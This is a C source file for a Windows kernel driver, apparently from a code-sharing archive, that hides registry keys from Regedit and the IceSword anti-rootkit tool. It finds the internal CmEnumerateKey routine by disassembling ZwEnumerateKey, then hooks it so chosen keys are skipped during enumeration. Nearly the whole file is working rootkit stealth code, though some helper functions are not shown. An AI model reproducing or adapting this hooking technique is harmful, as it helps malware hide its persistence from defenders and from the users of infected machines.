www.pudn.com > hidereg.rar > hidereg.c
//Hide Reg form IceSowrd ,Regedit , etc.
#include "ntifs.h"
#include "stdarg.h"
#include "stdio.h"
#include "stddef.h"
#include "stddef.h"
#include "xde.h"
#include "myfun.h"
DWORD gCMaddr; // CmEnueratekey
TypeCmEnumerateKey OrgCall;
DWORD LocateCmEnumerateKey()
{
int length = 0;
int totalLength = 0;
DWORD retaddr = 0;
struct xde_instr instr;
DWORD mask;
DWORD addr;
DWORD rvstart;
DWORD cmaddr;
int i;
PBYTE p;
int codecnt = 0; // count of code line from the begin of the call to the end
int pushcnt = 0; // count of "push"
DWORD precallcode = 0;
BYTE cCodebk[2000];
DWORD srvid = GetServiceID(ZwEnumerateKey);
addr = GetServiceTable(srvid);
if(!addr)
{
addr = GetServiceTable_Alt(srvid);
}
__try
{
if(addr)
{
//
//search for "ret 0x18"
//
while (totalLength < MAX_NT_ENUM_LEN)
{
length = xde_disasm((PBYTE)((int)addr + totalLength), &instr);
if (length == 0)
{
DbgPrint("disaaemble error!\n");
__leave;
}
//
//compute code break
//
cCodebk[codecnt] = (BYTE)length;
codecnt++;
totalLength += length;
mask = (*(PDWORD)(addr+totalLength))&0x00FFFFFF;
if(mask == 0x18C2)
break;
}
//find "ret 0x18" ?
if(totalLength >= MAX_NT_ENUM_LEN)
__leave;
//
//rvstart equals the end of the function
//
rvstart = (addr+totalLength);
p = addr;
i = codecnt;
//
//now we search from the end to the begin
//for the function call with 6 push operations
//but we should exclude ObReferenceObjectByHandle
//
while(rvstart != addr )
{
int nLen;
i--;
nLen = cCodebk[i];
rvstart-=nLen;
xde_disasm(rvstart, &instr);
if((instr.flag & C_PUSH)== C_PUSH)
pushcnt++;
if(*(PBYTE)rvstart == 0xE8) //call?
{
if(0 == precallcode)
{
pushcnt = 0;
precallcode = rvstart;
continue;
}
if(pushcnt == 6)
{
cmaddr = *(PDWORD)(precallcode+1)+precallcode+5;
if(cmaddr != ObReferenceObjectByHandle)
{
retaddr = cmaddr;
__leave;
}
}
pushcnt = 0;
precallcode = rvstart;
}
}
}
}
__finally{
NOTHING;
}
//error return
return retaddr;
}
NTSTATUS HookedCmCall(
IN PVOID KeyControlBlock,
IN ULONG Index,
IN KEY_INFORMATION_CLASS KeyInformationClass,
IN PVOID KeyInformation,
IN ULONG Length,
IN PULONG ResultLength
)
{
NTSTATUS status;
status = OrgCall(
KeyControlBlock,
Index,
KeyInformationClass,
KeyInformation,
Length,
ResultLength);
if(
(KeyInformationClass == KeyNodeInformation)
||
(KeyInformationClass == KeyBasicInformation)
)
{
//
//considering our driver will never be the last one
//so we will never consider the situation of "STATUS_NO_MORE_ENTRIES"
//
if(
(STATUS_SUCCESS == status)
)
{
if(!MmIsAddressValid(KeyInformation))
return status;
if(!IsCurrentProcessTryToSaveKey())
if(RegIndexShouldSkipOne(KeyControlBlock,Index))
{
return OrgCall(
KeyControlBlock,
Index+1,
KeyInformationClass,
KeyInformation,
Length,
ResultLength);
}
}
}
return status;
}
DWORD HideReg()
{
DWORD cmaddr;
cmaddr = (TypeCmEnumerateKey *)LocateCmEnumerateKey();
gCMaddr = cmaddr;
if(!cmaddr)
return 0;
//start to hook
//
HookCode((DWORD)cmaddr,(DWORD)HookedCmCall,(DWORD*)&OrgCall);
return cmaddr;
}